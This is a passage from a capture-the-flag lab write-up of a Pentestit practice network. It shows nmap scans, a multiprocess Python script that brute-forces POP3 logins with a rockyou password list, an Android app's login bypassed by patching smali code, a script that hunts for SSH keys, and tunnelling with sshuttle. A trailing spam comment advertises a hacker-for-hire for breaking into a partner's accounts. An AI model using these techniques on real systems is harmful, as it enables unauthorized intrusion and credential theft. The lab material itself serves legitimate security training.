35084/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.09 seconds
That's odd... Running another nmap
e.lindsey@tl10-ssh:/tmp/.test$ nmap -A -sV -Pn -p- -n -oA ssh-test 172.16.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-07 18:33 MSK
Nmap scan report for 172.16.0.1
Host is up (0.00098s latency).
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
38088/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u6 (protocol 2.0)
| ssh-hostkey: 1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|_2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.26 seconds
So the box is changing its listening port. Or more specifically, if you notice the port by doing consecutive nmaps, the port changes every some seconds. There is enough time to try for a connection. However, the private key I got doesn't seem to be working.
root@kali:~/Documents/pentestit# ssh -i keys rross@172.16.0.1 -p14277
Permission denied (publickey).
Oh well, let's leave this host for now, and I'll come back to it once I've got some more keys. At this point I take a step back to see where I stand.
While thinking about the next course of action, I remember I have a big list of emails that I still haven't actually used other than bruteforcing 3 of them.
However, things are different now, I have a foothold on the network, and I can practically try to bruteforce some mails accounts without actually going over the internet, using the lan speed between the boxes and do it much faster without worrying about it.
First, I nmap the "mail" box from within the network.
e.lindsey@tl10-ssh:~$ nmap -A -sV -T4 -p- -Pn -n 172.16.0.7
Starting Nmap 6.00 ( http://nmap.org ) at 2017-02-09 14:11 MSK
Nmap scan report for 172.16.0.7
Host is up (0.00069s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 1024 cc:70:0e:29:56:10:5b:84:c0:fb:7a:6b:f1:2b:bc:c9 (DSA)
|_2048 cb:c1:5a:0c:a2:72:16:af:3d:40:f3:e6:26:be:22:0a (RSA)
25/tcp open smtp CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
106/tcp open pop3pw?
110/tcp open tcpwrapped
|_pop3-capabilities: USER IMPLEMENTATION(CommuniGatePro) UIDL APOP TOP OK(K capability list follows) STLS PIPELINING LAST SASL(LOGIN PLAIN CRAM-MD5 DIGEST-MD5 GSSAPI MSN NTLM)
111/tcp open rpcbind (rpcbind V2-4) 2-4 (rpc #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35159/tcp status
|_ 100024 1 39861/udp status
143/tcp open imap
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID completed AUTH=DIGEST-MD5 CHILDREN BINARY OK IMAP4REV1 IMAP4 AUTH=CRAM-MD5 AUTH=MSN AUTH=PLAIN STARTTLS ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
389/tcp open ldap (Anonymous bind OK)
636/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
674/tcp open acap CommuniGate Pro ACAP server 6.0.9 (for mail client preference sharing)
993/tcp open ssl/imap
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
|_imap-capabilities: LOGIN-REFERRALS AUTH=GSSAPI QUOTA UNSELECT AUTH=NTLMA0001 LISTEXT AUTH=LOGIN ID AUTH=DIGEST-MD5 CHILDREN BINARY completed IMAP4REV1 IMAP4 OK AUTH=MSN AUTH=CRAM-MD5 AUTH=PLAIN ACL SASL-IR ESEARCH UIDPLUS LITERAL+ IDLE NAMESPACE MULTIAPPEND
3478/tcp open unknown
5060/tcp open sip-proxy CommuniGatePro VoIP Gateway 6.0.9
5061/tcp open ssl/sip-tls?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
5222/tcp open xmpp-client?
5223/tcp open ssl/hpvirtgrp?
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
5269/tcp open xmpp-server?
5349/tcp open ssl/unknown
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
8010/tcp open http CommuniGate Pro httpd 6.0.9
8021/tcp open ftp
8100/tcp open http CommuniGate Pro httpd 6.0.9
| http-methods: Potentially risky methods: PUT DELETE LOCK UNLOCK MKCOL PROPFIND PROPPATCH MOVE COPY REPORT SEARCH ACL MKCALENDAR
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: CommuniGate Pro gds.lab Entrance
9010/tcp open ssl/http CommuniGate Pro httpd 6.0.9
| ssl-cert: Subject: commonName=gds.lab/organizationName=CommuniGate Systems Customer
| Not valid before: 1998-02-02 00:00:00
|_Not valid after: 2028-02-02 00:00:00
9100/tcp open jetdirect?
11024/tcp open unknown
35159/tcp open status (status V1) 1 (rpc #100024)
6 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port106-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,4B,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.
SF:0\.9\x20ready\x20<4 gds="" lab="">\r\n")%r(GenericLines,89,"200\
SF:x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x20ready\
SF:x20<4 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use\x20HEL
SF:P\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(GetRequest,89,"2
SF:00\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x20rea
SF:dy\x20<5 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use\x20
SF:HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(HTTPOptions,8
SF:9,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.9\x2
SF:0ready\x20<6 gds="" lab="">\r\n500\x20Invalid\x20command;\x20use
SF:\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(RTSPReque
SF:st,89,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0\.
SF:9\x20ready\x20<7 gds="" lab="">\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(RPCCh
SF:eck,40C,"200\x20gds\.lab\x20CommuniGate\x20Pro\x20PWD\x20Server\x206\.0
SF:\.9\x20ready\x20<8 gds="" lab="">\r\n500\x20Invalid\x20command;\
SF:x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20I
SF:nvalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\
SF:x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\
SF:x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP
SF:\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comm
SF:and;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500
SF:\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inv
SF:alid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x2
SF:0HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x2
SF:0command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r
SF:\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comman
SF:d;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x
SF:20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20u
SF:se\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inval
SF:id\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20H
SF:ELP\r\n500\x20Invalid\x20command");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port143-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%r
SF:(NULL,36,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Server\
SF:x206\.0\.9\x20ready\r\n")%r(GetRequest,63,"\*\x20OK\x20gds\.lab\x20Comm
SF:uniGate\x20Pro\x20IMAP\x20Server\x206\.0\.9\x20ready\r\nGET\x20BAD\x20n
SF:ot\x20logged\x20in\r\n\x20BAD\x20bad\x20command\x20tag\r\n")%r(GenericL
SF:ines,62,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Server\x
SF:206\.0\.9\x20ready\r\n\x20BAD\x20bad\x20command\x20tag\r\n\x20BAD\x20ba
SF:d\x20command\x20tag\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port993-TCP:V=6.00%T=SSL%I=7%D=2/9%Time=589C4E74%P=x86_64-unknown-linux
SF:-gnu%r(NULL,36,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20S
SF:erver\x206\.0\.9\x20ready\r\n")%r(GenericLines,62,"\*\x20OK\x20gds\.lab
SF:\x20CommuniGate\x20Pro\x20IMAP\x20Server\x206\.0\.9\x20ready\r\n\x20BAD
SF:\x20bad\x20command\x20tag\r\n\x20BAD\x20bad\x20command\x20tag\r\n")%r(G
SF:etRequest,63,"\*\x20OK\x20gds\.lab\x20CommuniGate\x20Pro\x20IMAP\x20Ser
SF:ver\x206\.0\.9\x20ready\r\nGET\x20BAD\x20not\x20logged\x20in\r\n\x20BAD
SF:\x20bad\x20command\x20tag\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port5061-TCP:V=6.00%T=SSL%I=7%D=2/9%Time=589C4E88%P=x86_64-unknown-linu
SF:x-gnu%r(GenericLines,2,"\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8021-TCP:V=6.00%I=7%D=2/9%Time=589C4E6E%P=x86_64-unknown-linux-gnu%
SF:r(NULL,34,"220\x20gds\.lab\x20CommuniGate\x20Pro\x20FTP\x20Server\x206\
SF:.0\.9\x20ready\r\n")%r(GenericLines,72,"220\x20gds\.lab\x20CommuniGate\
SF:x20Pro\x20FTP\x20Server\x206\.0\.9\x20ready\r\n500\x20Invalid\x20comman
SF:d;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n")%r(
SF:Help,F9,"220\x20gds\.lab\x20CommuniGate\x20Pro\x20FTP\x20Server\x206\.0
SF:\.9\x20ready\r\n214-Commands\x20Supported:\r\n\x20AUTH\x20\x20HELP\x20\
SF:x20PASS\x20\x20STLS\x20\x20QUIT\x20\x20USER\r\n\x20Copyright\x20\(c\)\x
SF:201998-2013,\x20Stalker\x20Software,\x20Inc\.\r\n214-gds\.lab\x20\x20_t
SF:rial_\r\n214\x20To\x20report\x20problems\x20send\x20mail\x20to\x20\r\n")%r(SMBProgNeg,452,"220\x20gds\.lab\x20Commun
SF:iGate\x20Pro\x20FTP\x20Server\x206\.0\.9\x20ready\r\n500\x20Invalid\x20
SF:command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\
SF:n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command
SF:;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x2
SF:0Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20us
SF:e\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invali
SF:d\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HE
SF:LP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20co
SF:mmand;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n5
SF:00\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\
SF:x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20I
SF:nvalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\
SF:x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\
SF:x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP
SF:\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20comm
SF:and;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500
SF:\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Invalid\x20command;\x2
SF:0use\x20HELP\r\n500\x20Invalid\x20command;\x20use\x20HELP\r\n500\x20Inv
SF:alid");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port11024-TCP:V=6.00%I=7%D=2/9%Time=589C4E83%P=x86_64-unknown-linux-gnu
SF:%r(RPCCheck,35,"\0")%r(DNSVersionBindReq,35,"\0")%r(DNSStatusRequest,35,"\0")%r(
SF:SSLSessionReq,35,"\0")%r(Kerberos,35,"\0")%r(SMBProgNeg,35,"\0")%r(X11Probe,35,"
SF:\0"
SF:)%r(LDAPBindReq,35,"\0")%r(LANDesk-RC,35,"\0")%r(TerminalServer,35,"\0")%r(NCP,3
SF:5,"
SF:\0")%r(NotesRPC,35,"\0")%r(WMSRequest,35,"\0")%r(oracle-tns,35,"\0")%r(afp,35,"<
SF:error\x20errorText=\"XML\x20syntax\x20error\"\x20errorNum=\"500\"/>\0");
Service Info: Host: gds.lab
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.35 seconds
One hell of an output. And mail ports are open. So I'm good to go.
Now, I need to do the bruteforcing locally from the box I'm already in, using a script, so all I have to do is upload a password-list, a list with the users, and well, write the script itself.
For the passlist I will use rockyou-50.txt wich is contained in
SecLists and contains these passwords from the original rockyou with a 50% chance of success. The user list is the following
a.modlin@gds.lab
e.lindsey@gds.lab
e.vasilyev@gds.lab
j.wise@gds.lab
s.locklear@gds.lab
postmaster@gds.lab
a.byrns@mail.g-security.lab
a.fox@s-lab.test
a.lock@mail.g-security.lab
b.trokin@s-lab.test
d.rivers@mail.g-security.lab
e.lindsey@mail.g-security.lab
e.vasilyev@s-lab.test
h.farris@mail.g-security.lab
j.burris@mail.g-security.lab
m.ismail@mail.g-security.lab
m.minter@mail.g-security.lab
m.sopov@s-lab.test
m.wessel@mail.g-security.lab
managers@mail.g-security.lab
pbx@mail.g-security.lab
postmaster@mail.g-security.lab
r.black@mail.g-security.lab
r.dossett@mail.g-security.lab
s.ramos@mail.g-security.lab
v.nix@mail.g-security.lab
w.moran@mail.g-security.lab
w.phillips@mail.g-security.lab
And finally, the script.
import poplib
from multiprocessing import Pool
import logging
global credentials
credentials = []
global found
found = []
logger = logging.getLogger('test')
hdlr = logging.FileHandler('log.log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.DEBUG)
def Mailer(a):
result = ''
if a.split(':')[0] in found:
pass
else:
try:
Mailer = poplib.POP3('172.16.0.7')
Mailer.user(a.split(':')[0])
result = Mailer.pass_(a.split(':')[1])
except:
pass
logger.info('Run: ' + a)
if 'OK' in result:
print a
found.append(a.split(':')[0])
if __name__ == '__main__':
pool = Pool(processes=50)
with open('users.txt') as users:
for user in users:
credentials = []
with open('rockyou-50.txt') as passwords:
for password in passwords:
credentials.append(user.strip()+":"+password.strip())
logger.info('Appended: ' + user.strip()+":"+password.strip())
pool.map(Mailer, credentials)
The script is using 50 concurrent threads to connect to the pop server and try different credentials. It also writes a log file in order to track the progress since it's kind of a long process. Aaand let's go for it.
e.lindsey@tl10-ssh:/tmp/.test$ ls -l
total 32200
-rw-r--r-- 1 e.lindsey e.lindsey 1284 Feb 9 13:35 brute.py
-rw-r--r-- 1 e.lindsey e.lindsey 32879986 Feb 9 14:21 log.log
-rw-r--r-- 1 e.lindsey e.lindsey 75912 Feb 9 12:04 rockyou-50.txt
-rw-r--r-- 1 e.lindsey e.lindsey 643 Feb 9 14:02 users.txt
e.lindsey@tl10-ssh:/tmp/.test$ python brute.py
a.modlin@gds.lab:justdoit
There it is! a.modlin@gds.lab with password justdoit. Heading over to the web ui to check it out.
After logging in, a.modlin has 2 mails from j.wise.
The mail with Token subject:
Another token for my collection, this time for the "mail" box. Moving on with the other mail with subject Apps.
Very interesting. From what I know already, this must be about the "ssh-test" box I was looking at earlier. Grabbing a copy of that locally.
Starting up and Android Virtual Device and installing the apk through adb to see what I'm dealing with, proxying the application through Burp in case it tries to send anything out.
C:\Users\gknsb>C:\Users\gknsb\AppData\Local\Android\sdk\tools\emulator.exe -avd Test -http-proxy 127.0.0.1:8080
Hax is enabled
Hax ram_size 0x80000000
HAX is working and emulator runs in fast virt mode.
emulator: Listening for console connections on port: 5554
emulator: Serial number of this emulator (for ADB): emulator-5554
C:\Users\gknsb>adb install Documents\pentestit\gds-authenticator.apk
[100%] /data/local/tmp/gds-authenticator.apk
pkg: /data/local/tmp/gds-authenticator.apk
Success
Any credentials I try, even the previous ones that I found, result in the same message. So I'm not able to log in normally. Although I no requests are being made since I'm watching Burp too. Let's take a look under the hood of the application.
I unzip the application as if it was a zip file and use dex2jar to convert the .dex to .jar for better inspection.
C:\Users\gknsb\Documents\pentestit\gds-authenticator-zip>C:\Users\gknsb\Documents\Tools\dex2jar-2.0\d2j-dex2jar.bat classes.dex
dex2jar classes.dex -> .\classes-dex2jar.jar
Then, I open the jar with jd-gui to browse through the code. Browsing through the code, and following the logic behind the application I notice the following.
From the looks of it, no matter what I input, the application returns false during the authentication process, and the doInBackground fucntion is responsible from that output. So, I'm thinking about changing this "false" to "true" and that should bypass the authentication no matter what credentials I use.
With apktool I decompile the app, extracting the smali files.
C:\Users\gknsb\Documents\pentestit>apktool.bat d gds-authenticator.apk
I: Using Apktool 2.2.1 on gds-authenticator.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: C:\Users\echat\AppData\Local\apktool\framework\1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
Then, browsing through the decompiled code, the file that has to be edited is "LoginActivity$UserLoginTask.smali" and the lines that have to be changed are the following.
# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
.locals 5
.param p1, "params" # [Ljava/lang/Void;
.prologue
const/4 v4, 0x0
.line 315
const-wide/16 v2, 0x3e8
:try_start_0
invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
.line 316
const/4 v1, 0x0
Changed into:
# virtual methods
.method protected varargs doInBackground([Ljava/lang/Void;)Ljava/lang/Boolean;
.locals 5
.param p1, "params" # [Ljava/lang/Void;
.prologue
const/4 v4, 0x1
.line 315
const-wide/16 v2, 0x3e8
:try_start_0
invoke-static {v2, v3}, Ljava/lang/Thread;->sleep(J)V
.line 316
const/4 v1, 0x1
As seen from above, I am actually editing the decompiled code of the doInBackground function of the app, changing v4 and v1 variables from 0x0 (false) to 0x1 (true).
Recompiling the app, signing it, and then reinstalling it to the AVD.
C:\Users\gknsb\Documents\pentestit>apktool.bat b gds-authenticator
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...
C:\Users\gknsb\Documents\pentestit>..\Tools\dex2jar-2.0\d2j-apk-sign.bat -f -o gds-authenticator-signed.apk gds-authenticator\dist\gds-authenticator.apk
C:\Users\gknsb\Documents\pentestit>cd gds-authenticator
C:\Users\gknsb\Documents\pentestit\gds-authenticator>cd dist
C:\Users\gknsb\Documents\pentestit\gds-authenticator\dist>adb install gds-authenticator-signed.apk
[100%] /data/local/tmp/gds-authenticator-signed.apk
pkg: /data/local/tmp/gds-authenticator-signed.apk
Success
Aaaand finally, launch the app and try any credentials, that should bypass the login form and appear as a valid login.
That's it, login bypassed, and now according to the mail I can see the port that the ssh server of box "ssh-test" is listening at, at any given time. However I only have one key at this time, the one I found in rross's directory and that doesn't seem to work. I take a minute to go back and revisit those results and I notice the following.
e.lindsey@tl10-ssh:/tmp/.test$ ls -l /data/users/a.modlin/docs
ls: cannot open directory /data/users/a.modlin/docs: Permission denied
e.lindsey@tl10-ssh:/tmp/.test$ ls -l /data/users/rross/docs
total 8
-rw----r-- 1 root root 1675 Nov 25 15:17 keys
-rw-r--r-- 1 root root 9 Nov 25 15:43 token.txt
I had found the key for rross in docs, but for other users docs was still receiving the "Permission denied". That means that my previous bruteforcing might not have been enough since I was looking only for directories with depth 1. I decide to change that bruteforcing script to be recursive.
import os
from string import ascii_lowercase
from itertools import product
def findSubDir(baseDir):
for X in range(1, 5, 1):
keywords = [''.join(i) for i in product(ascii_lowercase, repeat = X)]
for word in keywords:
if os.path.exists(os.path.join(baseDir, word)):
print os.path.join(baseDir, word)
findSubDir(os.path.join(baseDir, word))
if __name__ == "__main__":
users = ['a.modlin', 'e.lindsey', 'g.leone', 'k.barth', 'm.howard', 'rross', 's.locklear']
for user in users:
findSubDir(os.path.join('/data/users', user))
Now running this new one...
e.lindsey@tl10-ssh:/tmp/.test$ python dirfinder.py
/data/users/a.modlin/tmp
/data/users/a.modlin/docs
/data/users/a.modlin/docs/key
/data/users/rross/tmp
/data/users/rross/docs
/data/users/rross/docs/keys
/data/users/s.locklear/tmp
/data/users/s.locklear/docs
Now that's interesting, a "key" appeared inside a.modlin's docs folder. Plus from the mail that he received, he is the one supposed to connect to "test-ssh" using his app for the random port that I already have. Let's see if this will work. First, I grab a local copy of the key and set the proper permissions. Then, I'll use
sshuttle to create a tunnel inside that network through the ssh I already have.
root@kali:~/Documents/pentestit# scp e.lindsey@192.168.101.9:/data/users/a.modlin/docs/key ./
e.lindsey@192.168.101.9's password:
key 100% 1675 17.5KB/s 00:00
root@kali:~/Documents/pentestit# chmod 0400 key
root@kali:~# sshuttle -r e.lindsey@192.168.101.9 172.16.0.0/24
e.lindsey@192.168.101.9's password:
client: Connected.
With shuttle in place and the key localy, I just try to connect to ssh-test internal address (172.16.0.1) as a.modlin, with his key, and on the port I get from the mobile app.
root@kali:~/Documents/pentestit# ssh -i key a.modlin@172.16.0.1 -p 9706
Linux tl10-test-ssh 3.2.0-4-amd64 #1 SMP Debian 3.2.81-2 x86_64
Last login: Fri Feb 24 18:18:10 2017 from 172.16.0.8
a.modlin@tl10-test-ssh:~$ ls -la
total 32
drwxr-x--- 3 root a.modlin 4096 Nov 25 21:17 .
drwxr-xr-x 3 root root 4096 Nov 25 20:40 ..
-rw-r----- 1 root a.modlin 257 Nov 25 20:43 .bash_history
-rw-r----- 1 root a.modlin 220 Nov 25 20:40 .bash_logout
-rw-r----- 1 root a.modlin 3392 Nov 25 20:40 .bashrc
-rw-r----- 1 root a.modlin 675 Nov 25 20:40 .profile
drwxr-x--- 2 root a.modlin 4096 Nov 25 20:41 .ssh
-rw-r--r-- 1 root root 9 Nov 25 21:17 token.txt
a.modlin@tl10-test-ssh:~$ cat token.txt
EN9ahVeW
Aaand another token! At this point due to my lack of time, I didn't finish the lab before they switched to a newer one sooo bad luck, this writeup has to stay here. :/
Hello,be warned, most of these so called hackers here are impostors, I know how real hackers work, they never advertise themselves in such a credulous manner and they are always discrete. I’ve been ripped off so many times out of desperation trying to find urgent help until my friend finally introduced me to a reliable hacker who's services are cheap and affordable, discretion and delivers, he does all sorts of hacks but he helped me:
ReplyDelete-Hacked my cheating boyfriend email,Facebook,whats app,Instagram,with snap chat,
I have made him my permanent hacker and you can as well enjoy his services.You can contact him at: (cyber.lord1010@gmail.com) and after his work also endeavor to spread the good news on his work and how he helped you.